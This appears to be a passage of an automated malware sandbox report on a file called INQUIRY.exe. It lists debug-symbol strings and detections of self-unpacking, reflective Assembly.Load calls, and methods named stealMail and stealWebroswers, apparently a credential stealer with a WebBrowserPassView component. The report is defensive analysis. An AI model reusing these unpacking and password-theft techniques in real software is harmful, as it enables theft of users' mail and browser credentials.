                    Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbo source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp
                    Source: Binary string: sechost.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: DWrite.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Drawing.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Management.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: version.pdb7 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000009.00000003.698225687.0000000002BC7000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.777673272.0000000002E84000.00000004.00000001.sdmp
                    Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: secur32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb9 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: ole32.pdb&kpir source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: mscoreei.pdb(kji source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: pnrpnsp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: shcore.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cordacwks.pdb# source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: .pdb* source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: secur32.pdbvi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: nlaapi.pdb5 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: fltLib.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msasn1.pdb! source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbe source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: shell32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msvcr80.i386.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: DWrite.pdbq source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: ws2_32.pdb.h;i source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasadhlp.pdb"hOi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wgdi32.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: nlaapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: winhttp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorsec.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wmiutils.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: gdiplus.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorwks.pdb% source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbH source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: rtutils.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000009.00000003.698202871.0000000002BC1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776011928.0000000002E7E000.00000004.00000001.sdmp
                    Source: Binary string: mscorwks.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: oleaut32.pdb8hUi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: profapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: f:\binaries.x86ret\bin\i386\Microsoft.VisualBasic.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorjit.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: shfolder.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: culture.pdbe source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: WMINet_Utils.pdb_ source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasman.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: fastprox.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemsvc.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: winrnr.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msctf.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: System.Runtime.Remoting.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: version.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wintrust.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorrc.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ws2_32.pdb- source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wmiutils.pdbbi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: psapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: WMINet_Utils.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemcomn.pdbS source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wbemprox.pdbee-c source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000009.00000003.699952597.0000000002BCD000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776039564.0000000002E8A000.00000004.00000001.sdmp
                    Source: Binary string: tsymbols\dll\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: combase.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dhcpcsvc.pdbThqia source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: 1_oC:\Windows\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemprox.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: cryptbase.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: culture.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: crypt32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cfgmgr32.pdb; source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: edputil.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp

                    Data Obfuscation:

                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\INQUIRY.exe Unpacked PE file: 1.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Source: C:\Users\user\Desktop\INQUIRY.exe Unpacked PE file: 16.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Source: C:\Users\user\Desktop\INQUIRY.exe Unpacked PE file: 28.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Source: C:\Users\user\Desktop\INQUIRY.exe Unpacked PE file: 33.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Detected unpacking (creates a PE file in dynamic memory)
                    Source: C:\Users\user\Desktop\INQUIRY.exe Unpacked PE file: 1.2.INQUIRY.exe.2300000.3.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exe Unpacked PE file: 16.2.INQUIRY.exe.2490000.3.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exe Unpacked PE file: 33.2.INQUIRY.exe.2380000.3.unpack
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\Desktop\INQUIRY.exe Unpacked PE file: 1.2.INQUIRY.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exe Unpacked PE file: 16.2.INQUIRY.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exe Unpacked PE file: 28.2.INQUIRY.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exe Unpacked PE file: 33.2.INQUIRY.exe.400000.0.unpack
                    .NET source code contains potential unpacker
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
